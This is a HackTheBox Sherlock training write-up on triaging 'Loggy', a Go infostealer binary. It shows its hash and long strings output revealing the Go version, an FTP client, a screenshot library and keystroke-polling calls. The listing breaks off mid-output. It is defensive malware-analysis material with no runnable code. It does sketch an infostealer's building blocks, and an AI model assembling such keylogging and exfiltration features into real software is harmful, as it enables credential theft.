Loggy

HackTheBox Sherlocks Janice from accounting is beside herself! She was contacted by the SOC to tell her that her work credentials were found on the dark web by the threat intel team. We managed to recover some files from her machine and sent them to the our REM analyst.

Task 1

What is the SHA-256 hash of this malware binary?

┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ sha256sum Loggy.exe
6acd8a362def62034cbd011e6632ba5120196e2011c83dc6045fcb28b590457c  Loggy.exe

Task 2

Since Golang follows the goX.Y.Z format, where X is currently 1 for all stable releases. Go 2.x is not officially released, all versions today begin with go1..

┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep "go1"
runtime: sp=abi mismatchRevertToSelfCreateEventWGetConsoleCPUnlockFileExVirtualQueryiphlpapi.dllnetapi32.dllinvalid slothost is downillegal seekGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileGetAddrInfoWnot pollabletlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap trafficmultipathtcp127.0.0.1:53no such hostunknown portinvalid portgetaddrinfowtransmitfileChooseColorWCreateBitmapGetTextColorGradientFillSetLastErroroleaut32.dllPdhOpenQueryWindowFromDCwinspool.drvgotypesaliashttpmuxgo121randautoseedECDSA-SHA256ECDSA-SHA384ECDSA-SHA512RCodeSuccessRCodeRefusedCfgMgr32.dllsetupapi.dllwintrust.dllwtsapi32.dllReportEventWCreateMutexWGetProcessIdReleaseMutexSetErrorModeSetStdHandleThread32NextVirtualAllocNtCreateFileCoCreateGuidinvalid baseSERIALNUMBERavx5124fmapsavx512bitalgfilter methodFindFirstFileparsing time  out of rangeCloseEventLogControlTraceWOpenEventLogWReadEventLogWRegEnumKeyExWRegOpenKeyExWStartServiceWImageList_AddGetDeviceCapsSetBrushOrgExRtlMoveMemoryFindResourceWModule32NextWSetSystemTimeGetSystemTimeVirtualFreeExSysFreeStringwglShareListsEnumProcessesShellExecuteWDestroyWindowGetWindowRectGetClientRectIntersectRectOpenClipboardFindWindowExWGetClassNameWBitBlt failed3814697265625invalid base not availablewakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitout of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen  MB globals,  work.nproc=  work.nwait=  nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error:  idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}
go1.22.3
C:/Program Files/Go/src/sort/sort_impl_go121.go
C:/Program Files/Go/src/vendor/golang.org/x/sys/cpu/runtime_auxv_go121.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/internal/poly1305/bits_go1.13.go
go1.22.3

in here we can see Go Runtime Debugging/Error Messages and Go Version and Standard Library Paths

go1.22.3 appears twice, confirming the Go version used to compile the binary.

Task 3

There are multiple GitHub repos referenced in the static strings. Which GitHub repo would be most likely suggest the ability of this malware to exfiltrate data?

┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep "github"
github.com/lxn/win
github.com/jlaffaye/ftp
"github.com/hashicorp/go-multierror
dep	github.com/TheTitanrain/w32	v0.0.0-20200114052255-2654d97dbd3d	h1:2xp1BQbqcDDaikHnASWpVZRjibOxu7y9LhAv04whugI=
dep	github.com/hashicorp/errwrap	v1.0.0	h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA=
dep	github.com/hashicorp/go-multierror	v1.1.1	h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
dep	github.com/jlaffaye/ftp	v0.2.0	h1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=
dep	github.com/kbinani/screenshot	v0.0.0-20230812210009-b87d31814237	h1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=
dep	github.com/lxn/win	v0.0.0-20210218163916-a377121e959e	h1:H+t6A/QJMbhCSEH5rAuRxh+CtW96g0Or0Fxa9IKr4uc=
github.com/TheTitanrain/w32.init
github.com/hashicorp/go-multierror.Append
github.com/hashicorp/go-multierror.ListFormatFunc
github.com/hashicorp/go-multierror.(*Error).Error
github.com/hashicorp/go-multierror.(*Error).GoString
github.com/hashicorp/go-multierror.(*Error).Unwrap
github.com/hashicorp/go-multierror.chain.Error
github.com/hashicorp/go-multierror.chain.Unwrap
github.com/hashicorp/go-multierror.chain.As
github.com/hashicorp/go-multierror.chain.Is
github.com/hashicorp/go-multierror.Error.Len
github.com/hashicorp/go-multierror.Error.Swap
github.com/hashicorp/go-multierror.Error.Less
github.com/hashicorp/go-multierror.(*Error).Len
github.com/hashicorp/go-multierror.(*Error).Less
github.com/hashicorp/go-multierror.(*Error).Swap
github.com/hashicorp/go-multierror.(*chain).As
github.com/hashicorp/go-multierror.(*chain).Error
github.com/hashicorp/go-multierror.(*chain).Is
github.com/hashicorp/go-multierror.(*chain).Unwrap
github.com/jlaffaye/ftp.(*debugWrapper).Close
github.com/jlaffaye/ftp.Dial
github.com/jlaffaye/ftp.(*ServerConn).authTLS
github.com/jlaffaye/ftp.Dial.func2
github.com/jlaffaye/ftp.Dial.func1
github.com/jlaffaye/ftp.(*dialOptions).wrapConn
github.com/jlaffaye/ftp.newDebugWrapper
github.com/jlaffaye/ftp.(*ServerConn).Login
github.com/jlaffaye/ftp.(*ServerConn).Type
github.com/jlaffaye/ftp.(*ServerConn).feat
github.com/jlaffaye/ftp.(*ServerConn).setUTF8
github.com/jlaffaye/ftp.(*ServerConn).epsv
github.com/jlaffaye/ftp.(*ServerConn).pasv
github.com/jlaffaye/ftp.(*ServerConn).getDataConnPort
github.com/jlaffaye/ftp.(*ServerConn).openDataConn
github.com/jlaffaye/ftp.(*ServerConn).cmd
github.com/jlaffaye/ftp.(*ServerConn).cmdDataConnFrom
github.com/jlaffaye/ftp.(*ServerConn).checkDataShut
github.com/jlaffaye/ftp.(*ServerConn).StorFrom
github.com/hashicorp/go-multierror.(*Error).ErrorOrNil
github.com/jlaffaye/ftp.(*ServerConn).Quit
github.com/jlaffaye/ftp.init
type:.eq.github.com/jlaffaye/ftp.debugWrapper
github.com/jlaffaye/ftp.debugWrapper.Read
github.com/jlaffaye/ftp.(*debugWrapper).Read
github.com/jlaffaye/ftp.debugWrapper.Write
github.com/jlaffaye/ftp.(*debugWrapper).Write
github.com/kbinani/screenshot/internal/util.CreateImage
github.com/kbinani/screenshot/internal/util.CreateImage.func1
github.com/lxn/win.init.0
github.com/lxn/win.init.1
github.com/lxn/win.init.2
github.com/lxn/win.init.3
github.com/lxn/win.BitBlt
github.com/lxn/win.CreateCompatibleBitmap
github.com/lxn/win.CreateCompatibleDC
github.com/lxn/win.DeleteDC
github.com/lxn/win.DeleteObject
github.com/lxn/win.GetDIBits
github.com/lxn/win.SelectObject
github.com/lxn/win.init.4
github.com/lxn/win.init.5
github.com/lxn/win.GlobalAlloc
github.com/lxn/win.GlobalFree
github.com/lxn/win.GlobalLock
github.com/lxn/win.GlobalUnlock
github.com/lxn/win.init.6
github.com/lxn/win.init.7
github.com/lxn/win.init.8
github.com/lxn/win.init.9
github.com/lxn/win.init.10
github.com/lxn/win.init.11
github.com/lxn/win.GetDC
github.com/lxn/win.ReleaseDC
github.com/lxn/win.init.12
github.com/lxn/win.init.13
github.com/kbinani/screenshot.init
github.com/kbinani/screenshot.CaptureRect
github.com/kbinani/screenshot.Capture
github.com/kbinani/screenshot.getDesktopWindow
github.com/kbinani/screenshot.Capture.deferwrap6
github.com/kbinani/screenshot.Capture.deferwrap5
github.com/kbinani/screenshot.Capture.deferwrap4
github.com/kbinani/screenshot.Capture.deferwrap3
github.com/kbinani/screenshot.Capture.deferwrap2
github.com/kbinani/screenshot.Capture.deferwrap1
github.com/kbinani/screenshot.NumActiveDisplays
github.com/kbinani/screenshot.enumDisplayMonitors
github.com/kbinani/screenshot.GetDisplayBounds
github.com/kbinani/screenshot.countupMonitorCallback
github.com/kbinani/screenshot.getMonitorBoundsCallback
github.com/kbinani/screenshot.getMonitorRealSize
github.com/TheTitanrain/w32.GetAsyncKeyState
github.com/jlaffaye/ftp.(*ServerConn).Stor
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/advapi32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/alpc.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/comctl32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/comdlg32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/create_process.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/dwmapi.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/fork.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/gdi32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/gdiplus.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/kernel32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/ole32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/oleaut32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/opengl32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/psapi.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/shell32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/user32.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/append.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/format.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/multierror.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/sort.go
C:/Users/verme/go/pkg/mod/github.com/jlaffaye/ftp@v0.2.0/debug.go
C:/Users/verme/go/pkg/mod/github.com/jlaffaye/ftp@v0.2.0/ftp.go
C:/Users/verme/go/pkg/mod/github.com/jlaffaye/ftp@v0.2.0/status.go
C:/Users/verme/go/pkg/mod/github.com/kbinani/screenshot@v0.0.0-20230812210009-b87d31814237/internal/util/util.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/advapi32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/comctl32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/comdlg32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/gdi32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/gdiplus.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/kernel32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/ole32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/oleaut32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/opengl32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/pdh.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/shell32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/user32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/uxtheme.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/winspool.go
C:/Users/verme/go/pkg/mod/github.com/kbinani/screenshot@v0.0.0-20230812210009-b87d31814237/screenshot_windows.go
C:/Users/verme/go/pkg/mod/github.com/kbinani/screenshot@v0.0.0-20230812210009-b87d31814237/screenshot.go
dep	github.com/TheTitanrain/w32	v0.0.0-20200114052255-2654d97dbd3d	h1:2xp1BQbqcDDaikHnASWpVZRjibOxu7y9LhAv04whugI=
dep	github.com/hashicorp/errwrap	v1.0.0	h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA=
dep	github.com/hashicorp/go-multierror	v1.1.1	h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
dep	github.com/jlaffaye/ftp	v0.2.0	h1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=
dep	github.com/kbinani/screenshot	v0.0.0-20230812210009-b87d31814237	h1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=
dep	github.com/lxn/win	v0.0.0-20210218163916-a377121e959e	h1:H+t6A/QJMbhCSEH5rAuRxh+CtW96g0Or0Fxa9IKr4uc=
github.com/TheTitanrain/w32.init
github.com/hashicorp/go-multierror.Append
github.com/hashicorp/go-multierror.ListFormatFunc
github.com/hashicorp/go-multierror.(*Error).Error
github.com/hashicorp/go-multierror.(*Error).GoString
github.com/hashicorp/go-multierror.(*Error).Unwrap
github.com/hashicorp/go-multierror.chain.Error
github.com/hashicorp/go-multierror.chain.Unwrap
github.com/hashicorp/go-multierror.chain.As
github.com/hashicorp/go-multierror.chain.Is
github.com/hashicorp/go-multierror.Error.Len
github.com/hashicorp/go-multierror.Error.Swap
github.com/hashicorp/go-multierror.Error.Less
github.com/hashicorp/go-multierror.(*Error).Len
github.com/hashicorp/go-multierror.(*Error).Less
github.com/hashicorp/go-multierror.(*Error).Swap
github.com/hashicorp/go-multierror.(*chain).As
github.com/hashicorp/go-multierror.(*chain).Error
github.com/hashicorp/go-multierror.(*chain).Is
github.com/hashicorp/go-multierror.(*chain).Unwrap
github.com/jlaffaye/ftp.(*debugWrapper).Close
github.com/jlaffaye/ftp.Dial
github.com/jlaffaye/ftp.Dial.func2
github.com/jlaffaye/ftp.Dial.func1
github.com/jlaffaye/ftp.(*dialOptions).wrapConn
github.com/jlaffaye/ftp.(*ServerConn).Login
github.com/jlaffaye/ftp.(*ServerConn).feat
github.com/jlaffaye/ftp.(*ServerConn).setUTF8
github.com/jlaffaye/ftp.(*ServerConn).epsv
github.com/jlaffaye/ftp.(*ServerConn).pasv
github.com/jlaffaye/ftp.(*ServerConn).getDataConnPort
github.com/jlaffaye/ftp.(*ServerConn).openDataConn
github.com/jlaffaye/ftp.(*ServerConn).cmd
github.com/jlaffaye/ftp.(*ServerConn).cmdDataConnFrom
github.com/jlaffaye/ftp.(*ServerConn).checkDataShut
github.com/jlaffaye/ftp.(*ServerConn).StorFrom
github.com/jlaffaye/ftp.(*ServerConn).Quit
github.com/jlaffaye/ftp.init
type:.eq.github.com/jlaffaye/ftp.debugWrapper
github.com/jlaffaye/ftp.debugWrapper.Read
github.com/jlaffaye/ftp.(*debugWrapper).Read
github.com/jlaffaye/ftp.debugWrapper.Write
github.com/jlaffaye/ftp.(*debugWrapper).Write
github.com/kbinani/screenshot/internal/util.CreateImage
github.com/kbinani/screenshot/internal/util.CreateImage.func1
github.com/lxn/win.init.0
github.com/lxn/win.init.1
github.com/lxn/win.init.2
github.com/lxn/win.init.3
github.com/lxn/win.BitBlt
github.com/lxn/win.CreateCompatibleBitmap
github.com/lxn/win.CreateCompatibleDC
github.com/lxn/win.DeleteDC
github.com/lxn/win.DeleteObject
github.com/lxn/win.GetDIBits
github.com/lxn/win.SelectObject
github.com/lxn/win.init.4
github.com/lxn/win.init.5
github.com/lxn/win.GlobalAlloc
github.com/lxn/win.GlobalFree
github.com/lxn/win.GlobalLock
github.com/lxn/win.GlobalUnlock
github.com/lxn/win.init.6
github.com/lxn/win.init.7
github.com/lxn/win.init.8
github.com/lxn/win.init.9
github.com/lxn/win.init.10
github.com/lxn/win.init.11
github.com/lxn/win.GetDC
github.com/lxn/win.ReleaseDC
github.com/lxn/win.init.12
github.com/lxn/win.init.13
github.com/kbinani/screenshot.init
github.com/kbinani/screenshot.CaptureRect
github.com/kbinani/screenshot.Capture
github.com/kbinani/screenshot.Capture.deferwrap6
github.com/kbinani/screenshot.Capture.deferwrap5
github.com/kbinani/screenshot.Capture.deferwrap4
github.com/kbinani/screenshot.Capture.deferwrap3
github.com/kbinani/screenshot.Capture.deferwrap2
github.com/kbinani/screenshot.Capture.deferwrap1
github.com/kbinani/screenshot.NumActiveDisplays
github.com/kbinani/screenshot.GetDisplayBounds
github.com/kbinani/screenshot.countupMonitorCallback
github.com/kbinani/screenshot.getMonitorBoundsCallback
github.com/kbinani/screenshot.getMonitorRealSize
github.com/TheTitanrain/w32..inittask
github.com/TheTitanrain/w32.modadvapi32
github.com/TheTitanrain/w32.modntdll
github.com/TheTitanrain/w32.modcomctl32
github.com/TheTitanrain/w32.modcomdlg32
github.com/TheTitanrain/w32.kernel32
github.com/TheTitanrain/w32.moddwmapi
github.com/TheTitanrain/w32.ntdll
github.com/TheTitanrain/w32.modgdi32
github.com/TheTitanrain/w32.modgdiplus
github.com/TheTitanrain/w32.modkernel32
github.com/TheTitanrain/w32.modole32
github.com/TheTitanrain/w32.modoleaut32
github.com/TheTitanrain/w32.modopengl32
github.com/TheTitanrain/w32.modpsapi
github.com/TheTitanrain/w32.modshell32
github.com/TheTitanrain/w32.moduser32
github.com/TheTitanrain/w32.procGetAsyncKeyState
github.com/jlaffaye/ftp..inittask
github.com/jlaffaye/ftp..typeAssert.3
github.com/jlaffaye/ftp..typeAssert.4
github.com/jlaffaye/ftp..typeAssert.5
github.com/jlaffaye/ftp..typeAssert.6
github.com/jlaffaye/ftp..typeAssert.12
github.com/jlaffaye/ftp..typeAssert.13
github.com/kbinani/screenshot..inittask
github.com/kbinani/screenshot.libUser32
github.com/kbinani/screenshot.funcGetDesktopWindow
github.com/kbinani/screenshot.funcEnumDisplayMonitors
github.com/kbinani/screenshot.funcGetMonitorInfo
github.com/kbinani/screenshot.funcEnumDisplaySettings
github.com/lxn/win..inittask
github.com/lxn/win.libadvapi32
github.com/lxn/win.regCloseKey
github.com/lxn/win.regOpenKeyEx
github.com/lxn/win.regQueryValueEx
github.com/lxn/win.regEnumValue
github.com/lxn/win.regSetValueEx
github.com/lxn/win.libcomctl32
github.com/lxn/win.imageList_Add
github.com/lxn/win.imageList_AddMasked
github.com/lxn/win.imageList_Create
github.com/lxn/win.imageList_Destroy
github.com/lxn/win.imageList_DrawEx
github.com/lxn/win.imageList_ReplaceIcon
github.com/lxn/win.initCommonControlsEx
github.com/lxn/win.loadIconMetric
github.com/lxn/win.loadIconWithScaleDown
github.com/lxn/win.libcomdlg32
github.com/lxn/win.chooseColor
github.com/lxn/win.commDlgExtendedError
github.com/lxn/win.getOpenFileName
github.com/lxn/win.getSaveFileName
github.com/lxn/win.printDlgEx
github.com/lxn/win.libgdi32
github.com/lxn/win.libmsimg32
github.com/lxn/win.abortDoc
github.com/lxn/win.addFontResourceEx
github.com/lxn/win.addFontMemResourceEx
github.com/lxn/win.alphaBlend
github.com/lxn/win.bitBlt
github.com/lxn/win.choosePixelFormat
github.com/lxn/win.closeEnhMetaFile
github.com/lxn/win.combineRgn
github.com/lxn/win.copyEnhMetaFile
github.com/lxn/win.createBitmap
github.com/lxn/win.createCompatibleBitmap
github.com/lxn/win.createBrushIndirect
github.com/lxn/win.createCompatibleDC
github.com/lxn/win.createDC
github.com/lxn/win.createDIBSection
github.com/lxn/win.createFontIndirect
github.com/lxn/win.createEnhMetaFile
github.com/lxn/win.createIC
github.com/lxn/win.createPatternBrush
github.com/lxn/win.createRectRgn
github.com/lxn/win.deleteDC
github.com/lxn/win.deleteEnhMetaFile
github.com/lxn/win.deleteObject
github.com/lxn/win.ellipse
github.com/lxn/win.endDoc
github.com/lxn/win.endPage
github.com/lxn/win.excludeClipRect
github.com/lxn/win.extCreatePen
github.com/lxn/win.fillRgn
github.com/lxn/win.gdiFlush
github.com/lxn/win.getBkColor
github.com/lxn/win.getDeviceCaps
github.com/lxn/win.getDIBits
github.com/lxn/win.getEnhMetaFile
github.com/lxn/win.getEnhMetaFileHeader
github.com/lxn/win.getObject
github.com/lxn/win.getPixel
github.com/lxn/win.getRgnBox
github.com/lxn/win.getStockObject
github.com/lxn/win.getTextColor
github.com/lxn/win.getTextExtentExPoint
github.com/lxn/win.getTextExtentPoint32
github.com/lxn/win.getTextMetrics
github.com/lxn/win.getViewportOrgEx
github.com/lxn/win.gradientFill
github.com/lxn/win.intersectClipRect
github.com/lxn/win.lineTo
github.com/lxn/win.moveToEx
github.com/lxn/win.playEnhMetaFile
github.com/lxn/win.polyline
github.com/lxn/win.rectangle
github.com/lxn/win.removeFontResourceEx
github.com/lxn/win.removeFontMemResourceEx
github.com/lxn/win.resetDC
github.com/lxn/win.restoreDC
github.com/lxn/win.roundRect
github.com/lxn/win.selectObject
github.com/lxn/win.setBkColor
github.com/lxn/win.setBkMode
github.com/lxn/win.setBrushOrgEx
github.com/lxn/win.setDIBits
github.com/lxn/win.setPixel
github.com/lxn/win.setPixelFormat
github.com/lxn/win.setStretchBltMode
github.com/lxn/win.setTextColor
github.com/lxn/win.setViewportOrgEx
github.com/lxn/win.saveDC
github.com/lxn/win.startDoc
github.com/lxn/win.startPage
github.com/lxn/win.stretchBlt
github.com/lxn/win.swapBuffers
github.com/lxn/win.textOut
github.com/lxn/win.transparentBlt
github.com/lxn/win.libgdiplus
github.com/lxn/win.gdipCreateBitmapFromFile
github.com/lxn/win.gdipCreateBitmapFromHBITMAP
github.com/lxn/win.gdipCreateHBITMAPFromBitmap
github.com/lxn/win.gdipDisposeImage
github.com/lxn/win.gdiplusShutdown
github.com/lxn/win.gdiplusStartup
github.com/lxn/win.libkernel32
github.com/lxn/win.activateActCtx
github.com/lxn/win.closeHandle
github.com/lxn/win.createActCtx
github.com/lxn/win.fileTimeToSystemTime
github.com/lxn/win.findResource
github.com/lxn/win.getConsoleTitle
github.com/lxn/win.getConsoleWindow
github.com/lxn/win.getCurrentThreadId
github.com/lxn/win.getLastError
github.com/lxn/win.getLocaleInfo
github.com/lxn/win.getLogicalDriveStrings
github.com/lxn/win.getModuleHandle
github.com/lxn/win.getNumberFormat
github.com/lxn/win.getPhysicallyInstalledSystemMemory
github.com/lxn/win.getProfileString
github.com/lxn/win.getThreadLocale
github.com/lxn/win.getThreadUILanguage
github.com/lxn/win.getVersion
github.com/lxn/win.globalAlloc
github.com/lxn/win.globalFree
github.com/lxn/win.globalLock
github.com/lxn/win.globalUnlock
github.com/lxn/win.moveMemory
github.com/lxn/win.mulDiv
github.com/lxn/win.loadResource
github.com/lxn/win.lockResource
github.com/lxn/win.setLastError
github.com/lxn/win.sizeofResource
github.com/lxn/win.systemTimeToFileTime
github.com/lxn/win.libole32
github.com/lxn/win.coCreateInstance
github.com/lxn/win.coGetClassObject
github.com/lxn/win.coInitializeEx
github.com/lxn/win.coTaskMemFree
github.com/lxn/win.coUninitialize
github.com/lxn/win.oleInitialize
github.com/lxn/win.oleSetContainedObject
github.com/lxn/win.oleUninitialize
github.com/lxn/win.liboleaut32
github.com/lxn/win.sysAllocString
github.com/lxn/win.sysFreeString
github.com/lxn/win.sysStringLen
github.com/lxn/win.lib
github.com/lxn/win.wglCopyContext
github.com/lxn/win.wglCreateContext
github.com/lxn/win.wglCreateLayerContext
github.com/lxn/win.wglDeleteContext
github.com/lxn/win.wglDescribeLayerPlane
github.com/lxn/win.wglGetCurrentContext
github.com/lxn/win.wglGetCurrentDC
github.com/lxn/win.wglGetLayerPaletteEntries
github.com/lxn/win.wglGetProcAddress
github.com/lxn/win.wglMakeCurrent
github.com/lxn/win.wglRealizeLayerPalette
github.com/lxn/win.wglSetLayerPaletteEntries
github.com/lxn/win.wglShareLists
github.com/lxn/win.wglSwapLayerBuffers
github.com/lxn/win.wglUseFontBitmaps
github.com/lxn/win.wglUseFontOutlines
github.com/lxn/win.libpdhDll
github.com/lxn/win.pdh_AddCounterW
github.com/lxn/win.pdh_AddEnglishCounterW
github.com/lxn/win.pdh_CloseQuery
github.com/lxn/win.pdh_CollectQueryData
github.com/lxn/win.pdh_GetFormattedCounterValue
github.com/lxn/win.pdh_GetFormattedCounterArrayW
github.com/lxn/win.pdh_OpenQuery
github.com/lxn/win.pdh_ValidatePathW
github.com/lxn/win.libshell32
github.com/lxn/win.dragAcceptFiles
github.com/lxn/win.dragFinish
github.com/lxn/win.dragQueryFile
github.com/lxn/win.extractIcon
github.com/lxn/win.shBrowseForFolder
github.com/lxn/win.shDefExtractIcon
github.com/lxn/win.shGetFileInfo
github.com/lxn/win.shGetPathFromIDList
github.com/lxn/win.shGetSpecialFolderPath
github.com/lxn/win.shParseDisplayName
github.com/lxn/win.shGetStockIconInfo
github.com/lxn/win.shellExecute
github.com/lxn/win.shell_NotifyIcon
github.com/lxn/win.libuser32
github.com/lxn/win.addClipboardFormatListener
github.com/lxn/win.adjustWindowRect
github.com/lxn/win.attachThreadInput
github.com/lxn/win.animateWindow
github.com/lxn/win.beginDeferWindowPos
github.com/lxn/win.beginPaint
github.com/lxn/win.bringWindowToTop
github.com/lxn/win.callWindowProc
github.com/lxn/win.changeWindowMessageFilterEx
github.com/lxn/win.checkMenuRadioItem
github.com/lxn/win.clientToScreen
github.com/lxn/win.closeClipboard
github.com/lxn/win.createDialogParam
github.com/lxn/win.createIconIndirect
github.com/lxn/win.createMenu
github.com/lxn/win.createPopupMenu
github.com/lxn/win.createWindowEx
github.com/lxn/win.deferWindowPos
github.com/lxn/win.defWindowProc
github.com/lxn/win.deleteMenu
github.com/lxn/win.destroyIcon
github.com/lxn/win.destroyMenu
github.com/lxn/win.destroyWindow
github.com/lxn/win.dialogBoxParam
github.com/lxn/win.dispatchMessage
github.com/lxn/win.drawIconEx
github.com/lxn/win.drawMenuBar
github.com/lxn/win.drawFocusRect
github.com/lxn/win.drawTextEx
github.com/lxn/win.emptyClipboard
github.com/lxn/win.enableMenuItem
github.com/lxn/win.enableWindow
github.com/lxn/win.endDeferWindowPos
github.com/lxn/win.endDialog
github.com/lxn/win.endPaint
github.com/lxn/win.enumChildWindows
github.com/lxn/win.findWindow
github.com/lxn/win.getActiveWindow
github.com/lxn/win.getAncestor
github.com/lxn/win.getCaretPos
github.com/lxn/win.getClassName
github.com/lxn/win.getClientRect
github.com/lxn/win.getClipboardData
github.com/lxn/win.getCursorPos
github.com/lxn/win.getDC
github.com/lxn/win.getDesktopWindow
github.com/lxn/win.getDlgItem
github.com/lxn/win.getDpiForWindow
github.com/lxn/win.getFocus
github.com/lxn/win.getForegroundWindow
github.com/lxn/win.getIconInfo
github.com/lxn/win.getKeyState
github.com/lxn/win.getMenuCheckMarkDimensions
github.com/lxn/win.getMenuInfo
github.com/lxn/win.getMenuItemCount
github.com/lxn/win.getMenuItemID
github.com/lxn/win.getMenuItemInfo
github.com/lxn/win.getMessage
github.com/lxn/win.getMonitorInfo
github.com/lxn/win.getParent
github.com/lxn/win.getRawInputData
github.com/lxn/win.getScrollInfo
github.com/lxn/win.getSubMenu
github.com/lxn/win.getSysColor
github.com/lxn/win.getSysColorBrush
github.com/lxn/win.getSystemMenu
github.com/lxn/win.getSystemMetrics
github.com/lxn/win.getSystemMetricsForDpi
github.com/lxn/win.getWindow
github.com/lxn/win.getWindowLong
github.com/lxn/win.getWindowLongPtr
github.com/lxn/win.getWindowPlacement
github.com/lxn/win.getWindowRect
github.com/lxn/win.getWindowThreadProcessId
github.com/lxn/win.insertMenuItem
github.com/lxn/win.invalidateRect
github.com/lxn/win.isChild
github.com/lxn/win.isClipboardFormatAvailable
github.com/lxn/win.isDialogMessage
github.com/lxn/win.isIconic
github.com/lxn/win.isWindowEnabled
github.com/lxn/win.isWindowVisible
github.com/lxn/win.isZoomed
github.com/lxn/win.killTimer
github.com/lxn/win.loadCursor
github.com/lxn/win.loadIcon
github.com/lxn/win.loadImage
github.com/lxn/win.loadMenu
github.com/lxn/win.loadString
github.com/lxn/win.messageBeep
github.com/lxn/win.messageBox
github.com/lxn/win.monitorFromWindow
github.com/lxn/win.moveWindow
github.com/lxn/win.notifyWinEvent
github.com/lxn/win.unregisterClass
github.com/lxn/win.openClipboard
github.com/lxn/win.peekMessage
github.com/lxn/win.postMessage
github.com/lxn/win.postQuitMessage
github.com/lxn/win.redrawWindow
github.com/lxn/win.registerClassEx
github.com/lxn/win.registerRawInputDevices
github.com/lxn/win.registerWindowMessage
github.com/lxn/win.releaseCapture
github.com/lxn/win.releaseDC
github.com/lxn/win.removeMenu
github.com/lxn/win.screenToClient
github.com/lxn/win.sendDlgItemMessage
github.com/lxn/win.sendInput
github.com/lxn/win.sendMessage
github.com/lxn/win.setActiveWindow
github.com/lxn/win.setCapture
github.com/lxn/win.setClipboardData
github.com/lxn/win.setCursor
github.com/lxn/win.setCursorPos
github.com/lxn/win.setFocus
github.com/lxn/win.setForegroundWindow
github.com/lxn/win.setMenu
github.com/lxn/win.setMenuDefaultItem
github.com/lxn/win.setMenuInfo
